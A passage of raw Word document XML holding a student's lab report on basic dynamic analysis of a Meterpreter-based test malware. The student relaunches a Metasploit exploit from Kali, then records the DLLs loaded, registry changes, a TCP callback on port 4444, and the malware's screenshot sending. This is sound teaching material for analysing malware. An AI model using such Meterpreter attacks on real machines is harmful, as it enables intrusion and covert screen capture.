        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="313289E9" wp14:editId="34D1A01F">
            <wp:extent cx="5943600" cy="3078480"/>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0000001E" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442EAB8B"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20" w14:textId="50826E1E" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000021"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3. Exit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> by typing ‘exit’. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000022" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000023"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4. Use the Process Explorer to kill the ‘test-malware’ process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000024" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000025" w14:textId="18E74BFA" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5A6565" w14:textId="32F0E102" w:rsidR="003032DA" w:rsidRDefault="003032DA" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF4D361" w14:textId="145E1F49" w:rsidR="003032DA" w:rsidRDefault="003032DA" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E2EE56" w14:textId="11DE49A3" w:rsidR="003032DA" w:rsidRDefault="003032DA" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BBB760" w14:textId="1776AA74" w:rsidR="003032DA" w:rsidRDefault="003032DA" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E75F00B" w14:textId="77777777" w:rsidR="003032DA" w:rsidRPr="003032DA" w:rsidRDefault="003032DA" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000026" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9"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lastRenderedPageBreak/>
        <w:t>Part  3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Performing basic dynamic analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000027"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Launch the attack again by typing ‘exploit’ in your Kali VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000028"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Perform basic dynamic analysis using tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>procmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">, process explorer, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>regshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000029" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000002A"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Report all your findings below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002B" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000002C"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1. Does the Malware load any DLL files?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ECFCEA"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2D" w14:textId="323353C5" w:rsidR="00E7527C" w:rsidRDefault="00BE3C45" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>t loads five DLL files, MSVCRT.DLL, KERNEL32.DLL, ADVAPI32.DLL, WSOCK32.DLL, WS2_32.DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76217B8A" w14:textId="42433B89" w:rsidR="00BE3C45" w:rsidRDefault="00BE3C45" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E23B38D" wp14:editId="09D818FC">
            <wp:extent cx="5943600" cy="34747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0000002E" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AD6A88"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2F" w14:textId="781E67FD" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000030" w14:textId="79A39140" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1308402F" w14:textId="77777777" w:rsidR="00D75942" w:rsidRPr="00D75942" w:rsidRDefault="00D75942" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000031"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lastRenderedPageBreak/>
        <w:t>2. Does the Malware modify the registry?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E206A3F"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617B0050" w14:textId="77777777" w:rsidR="00647D2F" w:rsidRDefault="00073504" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>es, it does change the registry of victim Window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000032" w14:textId="6F1DDA0A" w:rsidR="00E7527C" w:rsidRDefault="00647D2F" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Regshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to capture the difference of the registry. </w:t>
      </w:r>
      <w:r w:rsidR="00073504">
        <w:t xml:space="preserve">I copied the comparison of a first shot and a second shot. Total 80 changes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00073504">
        <w:t>has</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00073504">
        <w:t xml:space="preserve"> happed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29684457" w14:textId="77777777" w:rsidR="00073504" w:rsidRDefault="00073504" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4FC52D" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Regshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.8.3-beta1V5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C3912" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24364CB2" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Datetime:2022/9/29 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>18:30:14  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">  2022/9/29 18:31:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52290462" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Computer:IE9WIN</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>7 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> IE9WIN7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99F487" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Username:IEUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>IEUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F46991D" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626CBE9B" w14:textId="77777777" w:rsidR="00073504" w:rsidRPr="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>----------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D92EAF" w14:textId="0A041BE6" w:rsidR="00073504" w:rsidRDefault="00073504" w:rsidP="00073504">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Keys added:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E67651" w14:textId="77777777" w:rsidR="004675EB" w:rsidRPr="00073504" w:rsidRDefault="004675EB" w:rsidP="004675EB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Values added:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFA9AAF" w14:textId="77777777" w:rsidR="004675EB" w:rsidRPr="00073504" w:rsidRDefault="004675EB" w:rsidP="004675EB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073504">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Values modified:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAEEA25" w14:textId="237A7DCA" w:rsidR="004675EB" w:rsidRPr="004675EB" w:rsidRDefault="004675EB" w:rsidP="00073504">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>otal changes:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DBB3E1"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34" w14:textId="3F7431B2" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000035" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000036"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3. What protocol does the Malware use to interact with the Linux machine? Can you tell which port numbers are used by each machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25185C06"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37" w14:textId="7BF7ECE7" w:rsidR="00E7527C" w:rsidRDefault="00EC27C5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I can assume the protocol and ports from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714866B5" w14:textId="5E84C0BF" w:rsidR="00EC27C5" w:rsidRDefault="00EC27C5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali opened the port </w:t>
      </w:r>
      <w:r w:rsidR="00180EAF">
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151888F" w14:textId="13137DD5" w:rsidR="00EC27C5" w:rsidRPr="00180EAF" w:rsidRDefault="00EC27C5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ictim Window opened the port </w:t>
      </w:r>
      <w:r w:rsidR="00180EAF">
        <w:t>491</w:t>
      </w:r>
      <w:r w:rsidR="00180EAF">
        <w:t>60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23397E3B" w14:textId="6DCF163D" w:rsidR="00EC27C5" w:rsidRDefault="00EC27C5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nd they used TCP protocol to interact </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>others</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C951567" w14:textId="023188ED" w:rsidR="00180EAF" w:rsidRPr="00EC27C5" w:rsidRDefault="00180EAF" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nd I also scanned the traffic between Kali and Win using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and it showed the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000038" w14:textId="1EF2B01D" w:rsidR="00E7527C" w:rsidRDefault="00180EAF" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E901A17" wp14:editId="33996634">
            <wp:extent cx="5935980" cy="3070860"/>
            <wp:effectExtent l="0" t="0" r="762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3975A950"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3A" w14:textId="1E10290E" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000003B" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>4. What else can you say about this Malware?</w:t>
      </w:r>
      <w:r>
        <w:pict w14:anchorId="65180523">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003C" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEA7B8B"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3D" w14:textId="59A47AC3" w:rsidR="00E7527C" w:rsidRDefault="00BC21F4" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rom the test so far, </w:t>
      </w:r>
      <w:r w:rsidR="00913196">
        <w:t xml:space="preserve">malware program </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">initiates the connection between </w:t>
      </w:r>
      <w:r w:rsidR="00F770C9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">victim machine and </w:t>
      </w:r>
      <w:r w:rsidR="00F770C9">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t>attacker machine using TCP protocol. And the malware program sends the screenshot of a victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003E" w14:textId="6B0B18A9" w:rsidR="00E7527C" w:rsidRDefault="00F770C9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>nd I noticed a one thing from the malware program, whenever I execute the program, it increases the port number by one. That means it never uses the same port again! I can think of it as a trick because it can avoid block of a certain port.</w:t>
      </w:r>
    </w:p>
